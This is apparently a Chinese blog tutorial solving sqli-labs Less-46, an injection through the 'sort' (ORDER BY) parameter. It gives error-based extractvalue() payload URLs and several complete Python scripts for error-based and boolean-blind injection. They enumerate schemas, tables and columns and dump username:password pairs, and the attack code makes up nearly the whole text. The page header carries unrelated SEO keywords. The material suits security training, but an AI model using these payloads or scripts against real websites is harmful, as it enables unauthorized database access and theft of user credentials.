
传奇类型的网游_做一个网站app需要多少钱_网络营销企业有哪些_网站服务器查询工具

2025/2/25 8:09:27 来源:https://blog.csdn.net/weixin_73921499/article/details/145837168  浏览:    关键词:传奇类型的网游_做一个网站app需要多少钱_网络营销企业有哪些_网站服务器查询工具
传奇类型的网游_做一个网站app需要多少钱_网络营销企业有哪些_网站服务器查询工具

目录

报错注入

直接注入

数据库名

数据库中的表名

users表结构:

users表数据:

python脚本注入

直接注入

获取数据库名

获取表名

获取表结构

获取数据

布尔盲注

获取数据库名

获取表名

获取表结构

获取数据


报错注入

直接注入

数据库名

当前数据库名:

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select database() limit 1,1))))

系统数据库名:

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata))))

extractvalue() 的报错回显有长度限制(最多显示 32 个字符),需要使用截取函数 substr() 分段读取:

 http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),1,32))))

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),32,64))))

数据库中的表名

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'))))

同理使用截取函数substr():

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'),32,64))))

users表结构:

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),1,32))))

users表数据:

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),1,32))))

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),32,64))))

python脚本注入

直接注入

获取数据库名
import requests
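import re

# Lab endpoint used throughout the page (sqli-labs Less-46).
target_url = "http://sqli-labs:8013/Less-46/"


def extract_database_names():
    """Enumerate schema names through the error-based leak in the ``sort`` parameter.

    One request is sent per row of ``information_schema.schemata``; the value
    is read back from the ``XPATH syntax error`` text in the response body.
    The channel therefore exists only while the application echoes raw
    database errors and passes ``sort`` into the query unvalidated
    (presumably an ORDER BY clause; the server code is not shown here).
    Allow-listing sortable columns and returning generic error pages closes it.

    NOTE(review): MySQL truncates this error text, so long names may come
    back cut short.

    Returns:
        list: schema names recovered so far, in row order.
    """
    error_pattern = r"XPATH syntax error: '~([^']+)"
    database_names = []
    index = 0
    while True:
        payload = {"sort": f"(extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {index},1))))"}
        try:
            response = requests.get(target_url, params=payload, timeout=10)
            response.raise_for_status()
        except requests.exceptions.RequestException as e:
            # Timeout and HTTPError are subclasses of RequestException.
            # Stop here: the original retried the same index forever when the
            # failure was persistent.
            print(f"[-] 请求错误,索引为 {index}: {e}")
            break

        match = re.search(error_pattern, response.text)
        if match:
            db_name = match.group(1)
            database_names.append(db_name)
            print(f"成功提取数据库名: {db_name}")
            index += 1
            continue

        if index == 0:
            # Nothing came back on the very first row. The original message
            # said "found" here, which contradicted the rest of the sentence.
            print("未找到数据库名,可能漏洞不存在或错误信息被隐藏")
        else:
            print("已提取所有数据库名")
        break
    return database_names


if __name__ == "__main__":
    all_database_names = extract_database_names()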

获取表名
import requests
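import re

# Lab endpoint used throughout the page (sqli-labs Less-46).
target_url = "http://sqli-labs:8013/Less-46/"


def extract_table_names(database_name):
    """Enumerate the table names of one schema through the error-based leak.

    One request is sent per row of ``information_schema.tables``; the value is
    read back from the ``XPATH syntax error`` text in the response body. The
    leak depends on the application returning raw database errors and using
    ``sort`` unvalidated. Allow-listing sortable columns and suppressing
    database error output removes it.

    NOTE(review): MySQL truncates this error text, so long names may come
    back cut short.

    Args:
        database_name: schema whose tables are listed; interpolated into the
            query text as a quoted literal.

    Returns:
        list: table names recovered so far, in row order.
    """
    error_pattern = r"XPATH syntax error: '~([^']+)"
    table_names = []
    index = 0
    while True:
        payload = {"sort": f"(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='{database_name}' limit {index},1))))"}
        try:
            response = requests.get(target_url, params=payload, timeout=10)
            response.raise_for_status()
        except requests.exceptions.RequestException as e:
            # Timeout and HTTPError are subclasses of RequestException.
            # Stop here: the original retried the same index forever when the
            # failure was persistent.
            print(f"[-] 请求错误,索引为 {index}: {e}")
            break

        match = re.search(error_pattern, response.text)
        if match:
            table_name = match.group(1)
            table_names.append(table_name)
            print(f"成功提取表名: {table_name}")
            index += 1
            continue

        if index == 0:
            # Nothing came back on the very first row. The original message
            # said "found" here, which contradicted the rest of the sentence.
            print("未找到表名,可能漏洞不存在或错误信息被隐藏")
        else:
            print("已提取所有表名")
        break
    return table_names


if __name__ == "__main__":
    database_name = "security"  # target schema
    all_table_names = extract_table_names(database_name)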

获取表结构
import requests
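import re

# Lab endpoint used throughout the page (sqli-labs Less-46).
target_url = "http://sqli-labs:8013/Less-46/"


def extract_column_names(database_name, table_name):
    """Enumerate the column names of one table through the error-based leak.

    One request is sent per row of ``information_schema.columns``; the value
    is read back from the ``XPATH syntax error`` text in the response body.
    The leak depends on the application returning raw database errors and
    using ``sort`` unvalidated. Allow-listing sortable columns and suppressing
    database error output removes it.

    NOTE(review): MySQL truncates this error text, so long names may come
    back cut short.

    Args:
        database_name: schema that owns the table.
        table_name: table whose columns are listed.

    Returns:
        list: column names recovered so far, in row order.
    """
    error_pattern = r"XPATH syntax error: '~([^']+)"
    column_names = []
    index = 0
    while True:
        payload = {"sort": f"(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{database_name}' limit {index},1))))"}
        try:
            response = requests.get(target_url, params=payload, timeout=10)
            response.raise_for_status()
        except requests.exceptions.RequestException as e:
            # Timeout and HTTPError are subclasses of RequestException.
            # Stop here: the original retried the same index forever when the
            # failure was persistent.
            print(f"[-] 请求错误,索引为 {index}: {e}")
            break

        match = re.search(error_pattern, response.text)
        if match:
            column_name = match.group(1)
            column_names.append(column_name)
            print(f"成功提取列名: {column_name}")
            index += 1
            continue

        if index == 0:
            # Nothing came back on the very first row. The original message
            # said "found" here, which contradicted the rest of the sentence.
            print("未找到列名,可能漏洞不存在或错误信息被隐藏")
        else:
            print("已提取所有列名")
        break
    return column_names


if __name__ == "__main__":
    database_name = "security"  # target schema
    table_name = "users"        # target table
    all_column_names = extract_column_names(database_name, table_name)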

获取数据
import requests
import re

# Lab endpoint used throughout the page (sqli-labs Less-46).
target_url = "http://sqli-labs:8013/Less-46/"


def extract_user_data(database_name, table_name, record_id):
    """Read the ``username`` and ``password`` of one row via the error-based leak.

    Two requests are sent, username first and then password. Each value is
    taken from the ``XPATH syntax error`` text in the response body.

    NOTE(review): ``database_name`` is accepted but never used in the query.
    NOTE(review): a request failure and a missing id both yield ``{}``, so
    the driver loop below reports "no more data" in either case.

    Args:
        database_name: unused (see note above).
        table_name: table to read from; interpolated into the query text.
        record_id: value compared against the ``id`` column.

    Returns:
        dict: ``{'username': ..., 'password': ...}`` when both values were
        found in the responses, otherwise an empty dict.
    """
    error_pattern = r"XPATH syntax error: '~([^']+)"
    hits = {}
    try:
        for column in ("username", "password"):
            query = {"sort": f"(extractvalue(1,concat(0x7e,(select {column} from {table_name} where id={record_id} limit 0,1))))"}
            reply = requests.get(target_url, params=query, timeout=10)
            reply.raise_for_status()
            hits[column] = re.search(error_pattern, reply.text)
    except requests.exceptions.RequestException as e:
        # Timeout and HTTPError are subclasses of RequestException.
        print(f"[-] 请求错误,id={record_id}: {e}")
        return {}

    if not (hits["username"] and hits["password"]):
        return {}

    username = hits["username"].group(1)
    password = hits["password"].group(1)
    print(f"{username}:{password}")
    return {'username': username, 'password': password}


if __name__ == "__main__":
    database_name = "security"  # target schema
    table_name = "users"  # target table
    record_id = 1  # ids are probed upward from 1
    while True:
        print(f"正在提取 id={record_id} 的数据...")
        user_data = extract_user_data(database_name, table_name, record_id)
        if not user_data:
            # An empty result ends the run (see the notes on extract_user_data).
            print("没有更多数据,提取结束。")
            break
        record_id += 1

布尔盲注

获取数据库名
import requests
from bs4 import BeautifulSoup# 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):
    """Return the text of the first node matched by the fixed CSS selector.

    Args:
        resp: HTML text of a response page.

    Returns:
        str: text of the first matching cell, or "" when nothing matches.
        Callers compare this with 'Dumb' to tell which ordering was applied.
    """
    cells = BeautifulSoup(resp, 'html.parser').select(
        'body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)'
    )
    return cells[0].text if cells else ""


# Send a request to the target URL and return the response.
def send_request(url):
    """GET ``url`` and return the response, or ``None`` if the request failed.

    NOTE(review): no timeout is passed, so a stalled connection blocks the
    caller indefinitely.
    NOTE(review): callers test the return value for truthiness, so a failed
    request is indistinguishable from a "condition false" answer.
    """
    try:
        return requests.get(url)
    except requests.RequestException as err:
        print(f"Request error: {err}")
    return None


# Extract the database name.
def get_database_name():
    """Recover ``database()`` one character at a time and print it.

    Every character is found by binary search over codes 32..127. Each probe
    asks the server to order by ``id`` when the character code is greater
    than the guess and by ``username`` otherwise; a first listed username of
    'Dumb' is read as "greater" (presumably the first row by id in the lab's
    seed data; confirm against the lab). A search that settles on 32 ends
    the loop.

    Each character costs several requests that differ only in two numbers
    inside ``sort``. Server logs show this as a dense run of near-identical
    requests.
    """
    recovered = []
    position = 1
    while True:
        low, high = 32, 127
        while low < high:
            guess = (low + high) // 2
            url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr(database(),{position},1))>{guess},id,username) -- "
            page = send_request(url)
            if page and get_username(page.text) == 'Dumb':
                low = guess + 1
            else:
                high = guess
        # low == high here; the floor value 32 means nothing further was found.
        if low == 32:
            break
        recovered.append(chr(low))
        position += 1
    print(f"Database Name: {''.join(recovered)}")


if __name__ == '__main__':
    get_database_name()

获取表名
import requests
from bs4 import BeautifulSoup# 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):
    """Return the text of the first node matched by the fixed CSS selector.

    Args:
        resp: HTML text of a response page.

    Returns:
        str: text of the first matching cell, or "" when nothing matches.
        Callers compare this with 'Dumb' to tell which ordering was applied.
    """
    cells = BeautifulSoup(resp, 'html.parser').select(
        'body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)'
    )
    return cells[0].text if cells else ""


# Send a request to the target URL and return the response.
def send_request(url):
    """GET ``url`` and return the response, or ``None`` if the request failed.

    NOTE(review): no timeout is passed, so a stalled connection blocks the
    caller indefinitely.
    NOTE(review): callers test the return value for truthiness, so a failed
    request is indistinguishable from a "condition false" answer.
    """
    try:
        return requests.get(url)
    except requests.RequestException as err:
        print(f"Request error: {err}")
    return None


# Extract the table names.
def get_table_names():
    """Recover the current schema's table list character by character and print it.

    The value searched is ``group_concat(table_name)`` for
    ``table_schema=database()``. Every character is found by binary search
    over codes 32..127, using the row ordering of the response as the yes/no
    answer (first listed username 'Dumb' is read as "greater than the
    guess"). A search that settles on 32 ends the loop.

    Each character costs several requests that differ only in two numbers
    inside ``sort``. Server logs show this as a dense run of near-identical
    requests.
    """
    recovered = []
    position = 1
    while True:
        low, high = 32, 127
        while low < high:
            guess = (low + high) // 2
            url = (
                "http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(table_name) from "
                f"information_schema.tables where table_schema=database()),{position},1))>{guess},id,username) -- "
            )
            page = send_request(url)
            if page and get_username(page.text) == 'Dumb':
                low = guess + 1
            else:
                high = guess
        # low == high here; the floor value 32 means nothing further was found.
        if low == 32:
            break
        recovered.append(chr(low))
        position += 1
    print(f"Tables: {''.join(recovered)}")


if __name__ == '__main__':
    get_table_names()

获取表结构
import requests
from bs4 import BeautifulSoup# 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):
    """Return the text of the first node matched by the fixed CSS selector.

    Args:
        resp: HTML text of a response page.

    Returns:
        str: text of the first matching cell, or "" when nothing matches.
        Callers compare this with 'Dumb' to tell which ordering was applied.
    """
    cells = BeautifulSoup(resp, 'html.parser').select(
        'body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)'
    )
    return cells[0].text if cells else ""


# Send a request to the target URL and return the response.
def send_request(url):
    """GET ``url`` and return the response, or ``None`` if the request failed.

    NOTE(review): no timeout is passed, so a stalled connection blocks the
    caller indefinitely.
    NOTE(review): callers test the return value for truthiness, so a failed
    request is indistinguishable from a "condition false" answer.
    """
    try:
        return requests.get(url)
    except requests.RequestException as err:
        print(f"Request error: {err}")
    return None


# Extract the column names.
def get_column_names():
    """Recover the column list of ``users`` character by character and print it.

    The value searched is ``group_concat(column_name)`` for the ``users``
    table of the current schema. Every character is found by binary search
    over codes 32..127, using the row ordering of the response as the yes/no
    answer (first listed username 'Dumb' is read as "greater than the
    guess"). A search that settles on 32 ends the loop.

    Each character costs several requests that differ only in two numbers
    inside ``sort``. Server logs show this as a dense run of near-identical
    requests.
    """
    recovered = []
    position = 1
    while True:
        low, high = 32, 127
        while low < high:
            guess = (low + high) // 2
            url = (
                "http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(column_name) from "
                f"information_schema.columns where table_schema=database() and table_name='users'),{position},1))>{guess},id,username) -- "
            )
            page = send_request(url)
            if page and get_username(page.text) == 'Dumb':
                low = guess + 1
            else:
                high = guess
        # low == high here; the floor value 32 means nothing further was found.
        if low == 32:
            break
        recovered.append(chr(low))
        position += 1
    print(f"Columns in 'users': {''.join(recovered)}")


if __name__ == '__main__':
    get_column_names()

获取数据
import requests
from bs4 import BeautifulSoup# 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):
    """Return the text of the first node matched by the fixed CSS selector.

    Args:
        resp: HTML text of a response page.

    Returns:
        str: text of the first matching cell, or "" when nothing matches.
        Callers compare this with 'Dumb' to tell which ordering was applied.
    """
    cells = BeautifulSoup(resp, 'html.parser').select(
        'body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)'
    )
    return cells[0].text if cells else ""


# Send a request to the target URL and return the response.
def send_request(url):
    """GET ``url`` and return the response, or ``None`` if the request failed.

    NOTE(review): no timeout is passed, so a stalled connection blocks the
    caller indefinitely.
    NOTE(review): callers test the return value for truthiness, so a failed
    request is indistinguishable from a "condition false" answer.
    """
    try:
        return requests.get(url)
    except requests.RequestException as err:
        print(f"Request error: {err}")
    return None


# Extract row data (e.g. username:password).
def get_user_data():
    """Recover ``username:password`` pairs from ``users`` character by character and print them.

    The value searched is ``group_concat(username,':',password)``. Every
    character is found by binary search over codes 32..127, using the row
    ordering of the response as the yes/no answer (first listed username
    'Dumb' is read as "greater than the guess"). A search that settles on 32
    ends the loop.

    NOTE(review): 32 is also the code of a space, so a space inside the data
    would end the loop early.

    Each character costs several requests that differ only in two numbers
    inside ``sort``. Server logs show this as a dense run of near-identical
    requests.
    """
    recovered = []
    position = 1
    while True:
        low, high = 32, 127
        while low < high:
            guess = (low + high) // 2
            url = (
                "http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(username,':',password) "
                f"from users),{position},1))>{guess},id,username) -- "
            )
            page = send_request(url)
            if page and get_username(page.text) == 'Dumb':
                low = guess + 1
            else:
                high = guess
        # low == high here; the floor value 32 means nothing further was found.
        if low == 32:
            break
        recovered.append(chr(low))
        position += 1
    print(f"User Data (username:password): {''.join(recovered)}")


if __name__ == '__main__':
    get_user_data()
